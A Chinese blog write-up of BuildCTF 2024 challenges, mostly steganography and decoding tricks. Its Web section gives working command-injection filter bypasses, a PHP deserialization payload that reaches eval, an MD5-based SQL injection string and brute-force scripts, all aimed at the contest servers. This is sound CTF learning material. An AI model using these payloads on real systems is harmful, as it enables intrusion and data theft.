2024 BuildCTF WP

最新推荐文章于 2025-08-13 18:08:55 发布
原创 最新推荐文章于 2025-08-13 18:08:55 发布 · 2.1k 阅读 · 29 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #网络安全 #web安全 #安全

MISC
what is this?

二进制转ASCII

搜索到类似的题套用脚本

摩斯解密

 

一念愚即般若绝,一念智即般若生

阴阳怪气解码

解压文件是个佛曰解密

在天书解密

Base58解码

 

别真给我开盒了哥

直接问gpt京德高速旁边德铁路是什么

一个一个试试

需要全中文这个是BuildCTF{津保铁路}

老色批

使用stegsolve工具,有一个bsae编码把它解码

食不食油饼

需要把这个解密

使用工具得出一个编码给他解密

一个图片和一个加密的文本

使用工具直接梭哈

单图盲水印

还是一个编码

随波逐流一下

如果再来一次,还会选择我吗?

一个图片损坏

把损坏的图片放到winhex中查看,可以看到文件头不对每两个十六进制被调换了位置

使用python脚本恢复

def swap_hex_pairs(file_path):

    with open("D://脚本//password.png", 'rb') as f:

        data = f.read()

    hex_list = [hex(byte)[2:].zfill(2) for byte in data]

    new_hex_list = []

    for i in range(0, len(hex_list), 2):

        if i + 1 < len(hex_list):

            new_hex_list.append(hex_list[i + 1])

            new_hex_list.append(hex_list[i])

        else:

            new_hex_list.append(hex_list[i])

    return " ".join(new_hex_list)

def hex_to_binary(hex_str):

    binary = ""

    for hex_char in hex_str.split():

        decimal_value = int(hex_char, 16)

        binary += format(decimal_value, '08b')

    return binary

file_path = " password.png "

result_hex = swap_hex_pairs("D://脚本")

result_binary = hex_to_binary(result_hex)

new_file_path = "result.png"

with open(new_file_path, 'wb') as new_file:

 new_file.write(bytearray(int(result_binary[i:i+8], 2) for i in range(0, len(result_binary), 8)))

得出密码  8!67adz6

一个条形码被涂上了,直接使用条形码工具

key:wo_bu_shi_xiao_hei_zi!!!

解压后得到base64编码

使用赛博厨师帽进行解密,base64套娃

四妹,你听我解释

使用工具梭哈

这个是后部分的,在把图片放到kali中使用binwalk进行分离

分离出的直接使用cat查看

在进行解密

白白的真好看

附件

0000000.txt一眼0宽

Flag2:_wh1t3_y0u_s33

docx文件打开是空白

打开这个

然后全选加个颜色

Flag1:BuildCTF{Th3_wh1t3

开始找第三段

汉信码识别不出有用的东西但这个命名有用

回复得到

Snow.txt

想到snow隐写

使用snow隐写工具输入命令

得到第三部分flag

合并得到flag:BuildCTF{Th3_wh1t3_wh1t3_y0u_s33_1s_n0t_wh1t3}

Guesscoin

nc连接

笨办法一直猜一面,累计对60次获得flag

EZ_ZIP

解压附件

得到一张二维码

Binwalk分离出zip

发现是套中套使用连点器点出flag

有黑客!!!

下载附件解压后是一个.pacpng文件,wireshark打开进行流量分析

发现可以流量

进行base64解码

网上搜索发现是哥斯拉的流量

然后利用NetA流量分工具一键梭哈哥斯拉流量得到flag

WEB
find-the-id

根据提示抓包爆破1-300的整数

我写的网站被rce了?

开题

全是管理面板,尝试过扫描目录没有东西扫不了

于是对每个选项都进行了抓包,因为抓的包都关掉了就不截图了,最后其实可以有回显得只有日志和进程这两个包,进程包发现不管传入什么都只会返回当前进程,最后发现注入点肯定在日志包

也进一步说明了注入点就在这

让GPT写了个字典进行fuzz测试

经过简单fuzz测试

0-9和%*+;<>.大致不能使用

因为最后回显到页面上得是文字所以log_type背后的逻辑一定是一个文件读取命令

既然是文件读取命令那我们如果要进行RCE得话那就不能让他成功执行想到了使用||进行环境分割

测试cat很明显被禁止了

转义试试然后一般网页的页面都是index.php尝试获取背后逻辑

获取到逻辑

function getCPUUsage() {

$load = sys_getloadavg();

return $load[0];

}

function uptime(){

$output = shell_exec("uptime");

return htmlspecialchars($output);

}

function getPHPVersion() {

return phpversion();

}

function getPythonVersion() {

$output = shell_exec("python --version 2>&1");

return htmlspecialchars($output);

}

function getMySQLVersion() {

$output = shell_exec("mysql --version 2>&1");

return htmlspecialchars($output);

}

function getNginxVersion() {

$output = shell_exec("nginx -v 2>&1");

return htmlspecialchars($output);

}

function getKernelVersion() {

$output = shell_exec("uname -r 2>&1");

return htmlspecialchars($output);

}

function updateSystem() {

return "更新成功";

}

function checkuser(){

return "功能正在开发";

}

function adduser(){

return "功能正在开发";

}

function addadmin(){

return "功能正在开发";

}

function changuser(){

return "功能正在开发";

}

function backup_logs() {

return "备份成功!";

}

function ps() {

system("ps -a");

return "查看成功!";

}

function getLogs($logType) {

$logFile = '/var/log/nginx/' . $logType . '.log' ;

if (!preg_match("/;|&|\*|[0-9]|php|\.|flag|cat|more|less|head|sort|tail|sed|cut|awk|tac|strings|\<|\>| |od|curl|\%|\x09|\x26/i",$logType)){

if ($logType != "access"){

echo "$logFile".'该文件路径错误或不合法,请查看路径是否正确';

}

else{

echo "nginx日志查看成功\n";

echo "\n";

}

$logContent = system("cat $logFile");

echo $logContent;

}

else{

echo "有hacker!!!!你要不要看看你在输入什么?????";

}

}

$uptime = uptime();

$phpVersion = getPHPVersion();

$pythonVersion = getPythonVersion(); // Get Python version

$mysqlVersion = getMySQLVersion(); // Get MySQL version

$nginxVersion = getNginxVersion(); // Get Nginx version

$kernelVersion = getKernelVersion(); // Get kernel version

?>

提取逻辑

if (!preg_match("/;|&|\*|[0-9]|php|\.|flag|cat|more|less|head|sort|tail|sed|cut|awk|tac|strings|\<|\>| |od|curl|\%|\x09|\x26/i",$logType)){

if ($logType != "access"){

echo "$logFile".'该文件路径错误或不合法,请查看路径是否正确';

}

else{

echo "nginx日志查看成功\n";

echo "\n";

}

$logContent = system("cat $logFile");

echo $logContent;

}

else{

echo "有hacker!!!!你要不要看看你在输入什么?????";

}

尝试绕过进行命令执行

参考队友提供的笔记学到新东西了,结合waf进行修改

成功执行命令

log_type=||/bin/[l]s${IFS}/||

在根目录下发现flag

成功命令执行

log_type=||ca\t${IFS}/fla?||

BuildCTF{d5ced117-1c91-439b-95a6-c2aebbd2a7c5}

LovePopChain

<?php
class MyObject{
    public $NoLove="Do_You_Want_Fl4g?";
    public $Forgzy;
    public function __wakeup()
    {
        if($this->NoLove == "Do_You_Want_Fl4g?"){
            echo 'Love but not getting it!!';
        }
    }
    public function __invoke()
    {
        $this->Forgzy = clone new GaoZhouYue();
    }
}

class GaoZhouYue{
    public $Yuer;
    public $LastOne;
    public function __clone()
    {
        echo '最后一次了, 爱而不得, 未必就是遗憾~~';
        eval($_POST['y3y4']);
    }
}

class hybcx{
    public $JiuYue;
    public $Si;

    public function __call($fun1,$arg){
        $this->Si->JiuYue=$arg[0];
    }

    public function __toString(){
        $ai = $this->Si;
        echo 'I W1ll remember you';
        return $ai();
    }
}



if(isset($_GET['No_Need.For.Love'])){
    @unserialize($_GET['No_Need.For.Love']);
}else{
    highlight_file(__FILE__);
}

首先贴个代码,其次传入的是非法变量名

_要改成[,+之类的

分析链子,一开始走错了走了call链子发现属性重复了走不通,然后回头看直接走了tostring

然后直接传Myobject类调用invoke方法即可

<?php

class MyObject {

    public $NoLove ;

    public $Forgzy;

}

class hybcx {

    public $JiuYue;

    public $Si;

  

}

$a=new MyObject();

$b=new hybcx();

$a->NoLove=$b;

$b->Si=new MyObject();

echo serialize($a);

O:8:"MyObject":2:{s:6:"NoLove";O:5:"hybcx":2:{s:6:"JiuYue";N;s:2:"Si";O:8:"MyObject":2:{s:6:"NoLove";N;s:6:"Forgzy";N;}}s:6:"Forgzy";N;}

传入http://27.25.151.80:37734/?No[Need.For.Love=O:8:"MyObject":2:{s:6:"NoLove";O:5:"hybcx":2:{s:6:"JiuYue";N;s:2:"Si";O:8:"MyObject":2:{s:6:"NoLove";N;s:6:"Forgzy";N;}}s:6:"Forgzy";N;}

POST正常传参即可

获取flag

RedFlag

打开环境

一眼SSTI,测试发现存在

网上有类似的题:https://cloud.tencent.com/developer/article/2130787

直接用就出了

ez!http

进入环境

伪造地址

挨个伪造最终得到flag

ez_md5

进入环境

$password=$_POST['password'];

$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";

$result=mysqli_query($link,$sql);

if(mysqli_num_rows($result)>0){

    echo 'flag is :'.$flag;

}

else{

    echo '密码错误!';

}

看到这里的提交参数被MD5再组合进SQL查询语句,导致常规的注入手段几乎都失效了

但是注意到,MD5之后是hex格式,转化到字符串时如果出现'or'xxxx的形式,就会导致注入

这里提供一个抄来的字符串:ffifdyop

md5(ffifdyop,32) = 276f722736c95d99e921722cf9ed621c

转成字符串为'or'6�]��!r,��b

从而完成了注入

以上。

参考文章:https://blog.csdn.net/qq_24810241/article/details/79908449

直接注入

进入正题

Request首先要明白是post和get和cookie,一开始我发现第一层绕过不是有cooie的原因我是用burpsuit删除了cookie

进入正题

Request首先要明白是post和get和cookie,一开始我发现第一层绕过不是有cooie的原因我是用burpsuit删除了cookie

这是最后的传参结果,有提示robot,md5值是用robot里面的提示

level2

md5(114514xxxxxxx)

进行爆破出来的

爆破脚本

import hashlib

import itertools

import string

# 已知的前缀

prefix = "114514"

# 目标MD5哈希值

target_hash = "3e41f780146b6c246cd49dd296a3da28"

# 暴力破解的字符集(假设未知部分是由数字组成的)

charset = string.digits  # 如果你猜测未知部分是字母或其他字符,可以调整字符集

# 尝试7位的所有组合

for candidate in itertools.product(charset, repeat=7):

    # 构造完整的字符串

    test_string = prefix + ''.join(candidate)

    # 计算该字符串的MD5值

    md5_hash = hashlib.md5(test_string.encode()).hexdigest()

    # 比较MD5值是否与目标哈希相同

    if md5_hash == target_hash:

        print(f"找到匹配的字符串: {test_string}")

        break

else:

    print("未找到匹配的字符串")

tflock

进入环境

F12查看得到forgot-password.php访问一下

robots协议搜索到

访问得到ctfer账号和密码123456

admin但密码不知道

还有一个密码本

登录ctfer得到关键信息

然后登admin用给的密码本爆破试试

但是输错三次就被锁定了

思路中断

队中的师傅突然试出一个类似与卡bug的方法

就是在登录错误两次的情况下返回登录ctfer这个账号会重置admin登录错误的次数

根据这个思路一直往下,用burp抓包爆破

对ctfer这个包进行无限重发

在修改用户爆破admin的密码设置间隔

爆出密码

登录得到flag

Babyupload

进入环境

找到上传点

上传发现抓包改格式能上传.htaccess文件

然后绕过滤上传图片马

访问

连接

没找到flag,想到可能在环境变量

刮刮乐

进入环境

F12查看发现可以利用cmd传参

我们传个flag得到回显

然后伪造

接着想如何显示flag,队友想到外带的方式

但是没啥反响

接着队友构造出tac+/flag tee+1.txt;sleep+5

利用反向读取/flag的内容写道指定的1.txt文件中然后暂停5秒

回显了flag

Cookie_Factory

进入环境

发现f12被禁用了,发现可以用浏览器三个杠中的打开开发者工具能查看源码

Ai分析了js文件发现可以作弊利用下面这个图片上的最多弄到10000000000000000000

然后在一直传会闪出flag,我通过快捷截图截图到flag

PWN

我要成为沙威玛传奇

直接nc 连接

一直当小偷

偷够差不多600多个金币;直接购买100个沙威玛

然后直接输入2吃掉所有

这样就可以执行Linux命令了

直接 cat  flag

touch heart

简单的绕过字符

直接是s\h即可

Reverse

晴窗细乳戏分茶

首先进行了两次加密,然后判断得到的结果是否与flag相同。给定了加密后的结果和密钥,首先分析第一个加密函数,发现它是常见的TEA加密,使用的 delta 值是 0x9E3779B9,进行了32轮加密。可以直接用enc和key编写脚本进行解密,从而得到flag的前半部分。

第二个加密函数看起来像是XTEA加密,我之前接触得不多。需要搞清楚加密过程,编写对应的解密函数,传入enc和key,最终解出flag的后半部分

pyc

下载附件发现是一个pyc文件

直接用uncompyle6.exe.文件命令

拿到源码,编写脚本

BuildCTF{pcy_1s_eaey_for_Y0u}

Cylonely04
关注
BuildCTF2024 WEB部分wp
xaxt123的博客
10-27 1231
这里可以发现报错返回了Command ‘cat /var/www/html/src/docs/xxx’,这里的xxx是我们输入的文件名,那么就可以猜测后端代码为system(‘cat /var/www/html/src/docs/xxx’),所以我们可以利用逻辑拼接来绕过;然后就不提示了,接下来使用cmd来传入参数,猜测是命令执行,但是经过测试,任何命令都不回显,>1.txt却能够写入文件,只不过文件是空的,于是可以猜测后端代码为system($c." >/dev/null 2>&1");
算法分析:BUUCTF-2019全国赛的一道逆向题
m0_64973256的博客
04-13 329
1.对程序进行查壳,发现是个无壳vc编译的 2.运行程序,查看程序运行流程,在password中输入12345678,按下Crack按钮以后没有任何提示程序结束运行 3.依旧先让od跑一遍,以前说过的这种通过用户输入然后再按下按钮触发事件的先对GetDlgItemTextA函数断点看程序是否是用这个函数从输入框获取用户输入的 在输入框输入12345678按下Crack按钮后成功在GetDlgItemTextA函数断下,由于我们的断点是GetDlgItemTextA函数的入口点,属于系统
[BuildCTF 2024] 公开赛
weixin_52640415的博客
10-29 1029
给了p,q的RSA,略。
buildctfwp(1)
m0_73849764的博客
10-28 930
3.解题思路:先拼二维码然后可能要扫码获取关键的东西,但是刚开始进去之后关注完不知道干嘛,,通过之前的做法,向公众号输入password,得到一串字符,在观察所给的另一张图片,发现有隐写压缩包,通过binwalk拆不出来,后面用winhex分析知道少了数据,用脚本提取zip.双击后得到flag.txt,那么flag肯定藏在这里面,点击后发现有密码,由于没有任何提示,我就直接爆破,发现爆破不出来,把最后的txt文件放到010editor应用中查看,
BuildCTF线上赛WP
金灰的博客
10-26 1523
Build::CTF flag不到啊战队--WP战队,还请多多指教~ 目录 Build::CTF flag不到啊战队--WP Web ez!http find-the-id Pwn 我要成为沙威玛传奇 Misc what is this? 一念愚即般若绝,一念智即般若生 别真给我开盒了哥 四妹,你听我解释 如果再来一次,还会选择我吗? 白白的真好看 老色批 食不食油饼 四妹?还是萍萍呢? EZ_ZIP Guesscoin HEX的秘密 我太喜欢亢金
2024 BuildCTF 公开赛|MISC
zerorzeror的博客
10-27 2008
拼接字符串:BuildCTF{Th3_wh1t3_wh1t3_y0u_s33_1s_n0t_wh1t3},提交发现错误,发现flag有重叠部分,去掉后再提交。就四种图片,包括文件CRC也只有四类,大致看了图片,图片里没有什么隐写,那么就在于图片间隐藏了信息,脚本按照图片转成0123。opo,解压缩,得到JPG图片,应该是bmp图片,改后缀。发现webshell,解码,Url解码——反转——Base解码,发现key。67adz6,解压缩,修复条形码图片。
2024 BuildCTF 公开赛|Crypto
zerorzeror的博客
10-27 979
出现部分明文,估计要继续解密,密钥kfc。继续解密,密钥cronaldo。先用LCG求seed,即p。
API安全产品,面试官都被搞懵了
2401_83974173的博客
04-13 735
这些策略通常会结合使用,以提高产品在市场中的知名度和竞争力。
国赛ciscn2024-WP-re2-androidso-re(unidbg模拟执行Native层方法)
05-21
国赛ciscn2024-WP-re2-androidso_re(unidbg模拟执行Native层方法)
国赛ciscn2024-WP-re6-gdb-debug(伪随机数保护)
05-21
国赛ciscn2024-WP-re6-gdb_debug(伪随机数保护)
华三H3C WP2024 POE交换机PSE版本210文件
01-11
华三H3C WP2024 POE交换机PSE版本210文件,用于解决端口异常断电、无法供电等问题。
2024强网杯 Web WP
GKDf1sh
11-04 1827
qwb 2024 QWB 强网杯 2024 writeup WP 题解 WEB web 发现在text经过了,从而实现绕过黑名单。源码的大概意思是向blockly_json接口Post需要发的Block参数,flask接受到参数后进行黑名单查询,然后进行拼接语句形成代码将代码写入run.py,然后执行run.py,五秒后删除run.py。
BUUCTF-MISC-[BSidesSF2020]barcoder
zippo1234的博客
10-23 1949
BUUCTF-MISC-[BSidesSF2020]barcoder[BSidesSF2020]barcoder题目分析开始1.题目2.修复(1)把条形码部分单独截图出来(2)photoshop修复(3)逐段修复3.识别条形码4.get flag结语 每天一题,只能多不能少 [BSidesSF2020]barcoder 题目分析 条形码修复 开始 1.题目 Reveal my identity! What's the flag encoded in the badge? 就是要修复条形码。之前有很多类似
BUUCTF 逆向工程(reverse)之[BJDCTF2020]JustRE
weixin_44632787的博客
08-23 604
用IDA打开,然后搜索包含main的函数 找了一段时间,不知道从哪里下手。所以继续去搜索一下flag字符串 然后再搜索一下花括号{} 去找一下,它是怎么被使用的 所以可以看出来关键函数是:DialogFunc BOOL __stdcall DialogFunc(HWND hWnd, UINT a2, WPARAM a3, LPARAM a4) { CHAR String; // [esp+0h] [ebp-64h] if ( a2 != 272 ) { if ( a2 != 2
CTF学习记录--NewStar CTF 2024 week1 Crypto详解(纯小白)
qq_66853929的博客
10-16 1196
首先,题目调用了pwntools和pycryptodome两个python库,安装方法如下:在python配置正常后,按"win"+"R"键,打开"运行"窗口,输入"cmd",打开"命令提示符",输入以下字符串进行安装:
CTF学习第二站——CTF技能树Web前置技能HTTP协议之请求方式
qq_41174589的博客
10-02 323
注:在此之前需完成环境配置(安装BurpSuit,Firefox浏览器及Foxy proxy插件)由网页中的内容可知,我们将HTTP Method修改为CTF**B后就可以取得flag。2.刷网页后得到如下并右键发送到repeater。3.将其中的GET改为CTFHUB,并发送。1.打开网页代理与BurpSuit拦截。4.在右侧的响应中我们可以找到flag。5.复制,提交,注意不要漏掉右花括号。
CTF中将二进制文件每两个字节替换
Rinko233的博客
10-12 279
使用方法:编译后在程序目录下放置你要转换的文件,然后改名为input.bin,运行后会生成output.bin。今天刷BuildCTF发现有一个png文件中每两个字节都被调换,故写了一个C程序来把输入的文件进行转换.
面试实战 问题二十六 JDK 1.8 核心特性详解
最新发布
Rockandrollman的博客
08-13 478
面试实战 问题二十六 JDK 1.8 核心特性详解
Java 8 Stream API 完全指南:优雅处理集合数据
weixin_62938484的博客
08-12 1391
摘要:Java 8的Stream API为集合处理带来了革命性变革,提供声明式的函数式编程方式。文章系统介绍了Stream的核心概念、7种创建方式、中间操作(如filter、map)和终端操作(如collect、reduce),并详解并行流优化技巧。通过电商数据分析等实战案例,展示了Stream在复杂数据处理中的优势,包括代码简洁性、并行处理能力和惰性求值特性。最后给出性能优化建议,并对比传统循环,强调Stream适用于构建数据管道而非完全替代循环。
litctf 2024wp
12-29
当前可获得的信息主要集中在 LitCTF 2023 的解题报告和 WriteUp 上,而对于 LitCTF 2024 的具体 WriteUp 或解题报告尚未有公开资料提及[^2]。 通常情况下,CTF 比赛结束后一段时间内会由参赛者或主办方发布详细的 WriteUp 和解题思路。建议关注以下几个渠道来获取最的 LitCTF 2024 WriteUp: - **官方社交媒体账号**:许多 CTF 主办方会在 Twitter、微博或其他社交平台上分享比赛动态以及赛后总结。 - **安全博客和技术论坛**:像 FreeBuf、Seebug 等平台经常会有选手发表高质量的比赛回顾文章。 - **社区交流群组**:加入一些活跃的安全技术 QQ 群或者 Discord 频道可以更快地了解到发布的资源链接。 对于寻找特定年份的 CTF WriteUp,还可以尝试使用搜索引擎并加上时间筛选条件,以便更精准定位所需内容。 ```python import requests def search_litctf_writeups(year): query = f"LitCTF {year} writeup" url = "https://www.google.com/search?q=" + "+".join(query.split()) response = requests.get(url) if response.status_code == 200: print(f"Search results for '{query}' are available.") else: print("Failed to retrieve search results.") search_litctf_writeups(2024) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值